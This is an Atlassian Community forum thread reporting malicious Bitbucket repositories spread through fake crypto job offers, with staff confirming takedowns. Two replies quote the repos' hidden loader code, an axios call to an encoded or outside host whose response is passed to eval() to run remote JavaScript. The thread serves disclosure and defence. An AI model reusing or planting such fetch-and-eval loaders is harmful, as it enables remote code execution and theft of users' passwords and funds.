Forums
Home Product Q&A Discussion groups Articles Ask a question Search
Learning
Events
Champions

Forums

Articles
Create
cancel
Turn on suggestions
Showing results for 
Search instead for 
Did you mean: 
Product Q&A
See all
Community resources
Top groups
Explore all groups
Community resources
Learn
Community resources
Events
Community resources

This repo contains dangerous JavaScript code to download malware

harsh0707051
harsh0707051 January 28, 2025 edited


https://bitbucket.org/sarostechwork/futuremike/src/main/


Some guy reached out via linkedin for so called crypto projects and are urging people to run on bare metal instead of docker. I found out https://github.com/primno/dpapi to be malicious package which is downloaded by the project.  Reddit thread

https://tria.ge/250122-je84vawkfj/behavioral18 says it downloads an executable. 

Note: As a security researcher, I always run everything inside VM or docker so I am safe but if you are reading this and have executed it without docker or VM, I urge you to change all your banking, crypto, internet passwords. But before that wipe out entire system and reinstall everything.

Watch
Like Hana Kučerová likes this
627 views

3 answers

3 accepted

Comments for this post are closed

Community moderators have prevented the ability to post new answers.

Post a new question

0 votes
Answer accepted
Atlassian recommended
Andy Heinzer
Andy Heinzer
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
May 7, 2025

Hi Everyone,

While you can report malicious repos here in Community, I might not always see these in a timely manner.  There is a new process for how Atlassian handles these reports. Please send an email to abuse@atlassian.com with details of the repo in question.

This will create a report to our abuse team to review and process.

Thanks

Andy

Reply
0 votes
Answer accepted
Andy Heinzer
Andy Heinzer
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
January 29, 2025

Hi @harsh0707051 

Thanks for reporting this to us.  This repo has been taken down.

View More Comments
harsh0707051
harsh0707051 January 29, 2025

@Andy Heinzer Here is another one such repository. Please take it down as well. :)

https://bitbucket.org/mike_2025/dex_v2_mvp/src/main/

Based on the analysis it seems like this infects system based on following way:

https://bitbucket.org/mike_2025/dex_v2_mvp/src/43c1745d5cd72c9a44fc3390a42e212c00860ed8/server/controllers/userController.js?at=main#lines-216

the javascript function calls an pretty good hidden host with code below and upon getting the error result (which this url is throwing & can be command & control center / dynamic ip host my malicious actor). The result is obscured code. That result might be dowloading something which they are decrypting with https://github.com/primno/dpapi and that's why https://tria.ge/250122-je84vawkfj/behavioral18 might've tagged it for potential malware based on behaviour analysis.
 

```

const JWT_KEY = "aHR0cDovL2JsYXN0YXBpLm9yZy9hcGkvc2VydmljZS90b2tlbi8xMWFiNzU5ZDE4OWRjOGJjMjM4Y2IyNTI1ZjA1Yjg4Yw==";

const getToken = (async () => {
await axios.get(atob(JWT_KEY))
.then(res=>res.data)
.catch(err=>eval(err.response.data));
})();

```


Since it is running on server side in express js, it just downloads arbitrary obscure javascript payload and is further downloading malware from that.

And that's how they are infecting users!!

Like
Andy Heinzer
Andy Heinzer
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
January 30, 2025

Thanks @harsh0707051 

I relayed this to my team. The have taken down the bitbucket repo and suspended the user in question.

 

Like
Roy Scheepens
Roy Scheepens
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
May 5, 2025

Hey @Andy Heinzer another one popped up recently - https://bitbucket.org/screen_check/mike_dex_updated

Inside of orderController.js you can find the following code: 

exports.getCookie= asyncErrorHandler(async (req, res, next) => {
axios.get(`http://chainlink-api-v3.cloud/api/service/token/0c0c85f03e5d65977b45423b97c9aa87`)

 .then(res => res.data)

 .catch(err => eval(err.response.data || "404"));

})();
Same technique, just as dangerous. Other repos from the same user contain similar code exploits.
Like
Andy Heinzer
Andy Heinzer
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
May 7, 2025

Thanks for reporting it @Roy Scheepens 

The anti-abuse team appears to have suspended the repo and user.

In the future, please send an email to abuse@atlassian.com as the means to inform that team of malicious or suspicious Bitbucket sites.

Like
Reply
0 votes
Answer accepted
Mikael Sandberg
Mikael Sandberg
Community Champion
January 28, 2025

Hi @harsh0707051,

Welcome to Atlassian Community!

You can report this to abuse@atlassian.com. The mailbox will never respond to submissions, but the info sent there is reviewed by Atlassian's anti-abuse team. 

Reply

Comments for this post are closed

Community moderators have prevented the ability to post new answers.

Post a new question

Bitbucket
Bitbucket
DEPLOYMENT TYPE
CLOUD
TAGS
AUG Leaders

Atlassian Community Events

Community
Forums
FAQs Forums guidelines
Learning
About learning Resources
Events
Champions
Copyright © 2025 Atlassian
Privacy Policy Terms Security